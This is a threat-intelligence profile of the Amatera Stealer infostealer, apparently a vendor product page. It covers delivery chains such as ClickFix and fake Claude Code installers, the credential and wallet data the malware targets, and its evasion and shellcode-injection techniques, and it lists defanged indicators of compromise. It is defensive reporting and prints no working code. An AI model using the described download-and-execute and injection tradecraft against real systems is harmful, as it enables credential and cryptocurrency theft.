Amatera Stealer
Amatera Stealer is a C++ information-stealing malware family and malware-as-a-service offering that emerged as a rebranded and significantly updated successor to ACR Stealer (also referred to as AcridRain), with reporting also linking its lineage to GrMsk Stealer. It has been marketed on underground forums and via Telegram, and reporting associates earlier ACR/Amatera activity with the threat actor SheldIO. Multiple sources describe it as a commodity infostealer and, in some reporting, as a likely successor or alternative to Lumma following disruption of Lumma operations.
Observed delivery vectors include ClearFake web inject campaigns, ClickFix and InstallFix social-engineering chains, fake CAPTCHA prompts, malicious Google Ads, cloned Claude Code installation pages, fake software downloads and cracked software lures, MSHTA-based loader chains, CountLoader, GoFlateLoader, and abuse of the signed Microsoft App-V script SyncAppvPublishingServer.vbs. On Windows, several campaigns used mshta.exe and multi-stage PowerShell or HTA/.NET loader chains to execute Amatera in memory; one campaign used a signed App-V script as a proxy for PowerShell execution. Amatera has also been delivered through compromised websites using EtherHiding and fake localized CAPTCHA overlays, and through malicious traffic distribution systems serving password-protected archives. GoFlateLoader has been observed delivering Amatera alongside other stealers, while Bitdefender linked Amatera delivery to MSHTA-heavy chains involving CountLoader.
The malware steals browser-stored credentials, cookies, session tokens, browser data, crypto-wallet information, browser wallet extensions, desktop wallet data, password manager data, email and messaging application data, SSH and FTP tool data, and system information. Reported targets include Signal, WhatsApp, XMPP clients, Discord, and files from user directories including the Downloads folder. Some reporting states it can bypass Chrome App-Bound Encryption by injecting shellcode into Chromium-based browsers to copy sensitive files for exfiltration. eSentire reported expanded harvesting to 65 browser targets, 165 wallet browser extensions, and 137 desktop wallet targets, plus file-grabber logic for wallet exports, seed phrases, private keys, passwords, JSON, TXT, PDF, and KDBX files.
Amatera is actively developed and includes multiple stealth and evasion features. Reported capabilities include dynamic API resolution, WoW64 syscall-based execution, direct interaction with \Device\Afd\Endpoint via NTSockets instead of Winsock, RecycledGate/FreshyCalls/Hell's Gate-style syscall resolution, anti-debugging checks, anti-analysis checks, geofencing for Ukrainian keyboard layouts, and checks for Kaspersky-related drivers. It has been observed retrieving configuration from C2 rather than embedding it statically, using encoded JSON, and supporting download-and-execute of additional payloads including .exe, .cmd, .dll, and .ps1 files. eSentire reported a reflective shellcode loader that decrypts payloads with a 128-byte XOR key, decompresses them with aPLib, and can erase PE headers in memory. Reporting also notes upgrades in C2 protection from AES-256-CBC to ECDH over NIST P-256 with ChaCha20-Poly1305 in some variants, while other reporting observed HTTP C2 with Base64- and XOR-encoded data and newer support for HTTPS.
Associated infrastructure and indicators directly mentioned in the reporting include domains amaprox[.]icu, b1[.]talismanoverblown[.]com, compactedtightness.cfd, contatoplus[.]com, claude[.]update-version[.]com, and oakenfjrod.ru; IPs 104.21.80[.]1, 172.67.178[.]5, 77.91.97.244, and 144[.]124.235.102; and the ClearFake BNB Smart Chain Testnet contract 0x80d31D935f0EC978253A26D48B5593599B9542C7. Reported sample hashes include e913fa5b2dd0a7fc3dbaf0a6f882b3ead9a58511bd945b6e5c478cbd2b900508 and ec1206989449d30746b5ceb2b297cda9f3f09636a0e122ecafb40b1dc2e86772. Proofpoint also published Emerging Threats signatures 2052674, 2062510, and 2062511 for Amatera/ACR Stealer C2 check-in and exfiltration detection.
Victimology in the provided reporting includes broad commodity targeting, with specific observations affecting developers searching for AI tooling such as Claude Code, users exposed to fake software/crack ecosystems, and at least one intercepted intrusion in a finance-sector environment. Bitdefender's reporting suggests some App-V-based ClickFix delivery may preferentially affect enterprise-managed Windows environments because App-V is typically present on Enterprise, Education, and Server editions.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
In late April 2026, eSentire's Threat Response Unit (TRU) intercepted an attempted delivery of Amatera Stealer within a customer environment in the Finance industry. Amatera Stealer is a rebranded version of ACR (AcridRain) Stealer, a C++ based information stealer previously marketed as Malware-as-a-Service (MaaS) on underground forums by the threat actor SheldIO.
Techniques & procedures
29 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
2 techniques
Initial Access
Execution
6 techniques
Execution
This command uses PowerShell to download a malicious C# project file (.csproj) from a remote server using Invoke-RestMethod (irm), saves it to the temporary directory, and then executes it using msbuild.exe.
The next step instructed the user to press Ctrl+V, which pastes the command into the Windows Run dialog, followed by the final step of pressing Enter to run the command.
Another interesting feature that was not previously documented relative to this malware is its use of WoW64 Syscalls... this sample defines various functions that stage a Windows API to be resolved and executed dynamically. | The code used to initialize contact with the C2 at this stage leverages NTSockets by interfacing with the device “\\Device\\Afd\\Endpoint” directly, rather than using the Winsock library.
The command uses PowerShell to download a malicious C# project file (.csproj) from a remote server using Invoke-RestMethod (irm), saves it to the temporary directory, and then executes it using msbuild.exe — a legitimate .NET build tool included in Windows.
Privilege Escalation
3 techniques
Privilege Escalation
Finally, the script performs a shellcode injection routine using a combination of Early Bird and Context Hijack techniques. It begins with the Early Bird injection by launching a legitimate Windows process — OpenWith.exe — in a suspended state... allocates executable memory inside the suspended process, and writes the shellcode into that space.
Next, it uses context hijacking by retrieving and modifying the CPU context of the suspended thread — specifically changing the instruction pointer (EIP) so that when the process is resumed, it begins executing the injected shellcode instead of its original code.
Stealth
11 techniques
Stealth
The .csproj file contained obfuscated logic that reconstructs and runs another layer of Base64-encoded PowerShell... This third PowerShell script is again heavily obfuscated and uses XOR encoding.
Inside the archive is a file called Setup.exe, which is actually a legitimate Python interpreter bundled with malicious scripts... it uses a renamed MSHTA copy disguised as iso2022.exe
The vast majority of detections for mshta.exe come from instances where the command line contains domains that appear to be legitimate services but are hosted on the .cc TLD... Starting in late February 2026... shifted to .vg and .gl TLDs.
Finally, the script performs a shellcode injection routine using a combination of Early Bird and Context Hijack techniques. It begins with the Early Bird injection by launching a legitimate Windows process — OpenWith.exe — in a suspended state... allocates executable memory inside the suspended process, and writes the shellcode into that space.
Next, it uses context hijacking by retrieving and modifying the CPU context of the suspended thread — specifically changing the instruction pointer (EIP) so that when the process is resumed, it begins executing the injected shellcode instead of its original code.
It begins with the Early Bird injection by launching a legitimate Windows process — OpenWith.exe — in a suspended state, meaning the process is created but not yet allowed to run.
The script first disables PowerShell logging and suppresses output by setting all preference variables (such as ErrorActionPreference, VerbosePreference, etc.) to SilentlyContinue and overriding built-in functions like Write-Host.
The command uses PowerShell to download a malicious C# project file (.csproj) from a remote server using Invoke-RestMethod (irm), saves it to the temporary directory, and then executes it using msbuild.exe — a legitimate .NET build tool included in Windows.
It uses a 128-byte XOR key to first decrypt the encrypted payload blob, then aPLib to decompress it.
The tool is MSHTA, short for Microsoft HTML Application Host, a built-in Windows utility that can run scripts from local files and remote internet locations... Attackers have been using it to deliver some of today’s most harmful malware... All use MSHTA as a stepping stone during early or middle stages of infection.
Credential Access
4 techniques
Credential Access
Stealing browser data relating to Cookies, Web Forms, Profile Data (web history)
Amatera Stealer currently focuses on stealing information from installed software like browsers, crypto wallets and other software... Stealing browser data relating to Cookies, Web Forms, Profile Data.
Discovery
2 techniques
Discovery
Command and Control
3 techniques
Command and Control
The malware initiates contact with its configured command and control (C2) server via HTTP shortly after execution... Samples of Amatera Stealer observed in May 2025 contain code which suggests new support for HTTPS requests.
Exfiltration
1 technique
Exfiltration
IOCs tracked for this family
78 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
46 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
An information stealer observed as a payload delivered by GoFlateLoader.
An information stealer delivered by GoFlateLoader to harvest saved passwords, browser data, and cryptocurrency wallet credentials from infected machines.
An information stealer observed as a final payload delivered by GoFlateLoader.
A stealer delivered in the same CountLoader/MSHTA infection chain as LummaStealer, targeting browser and wallet-related data.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.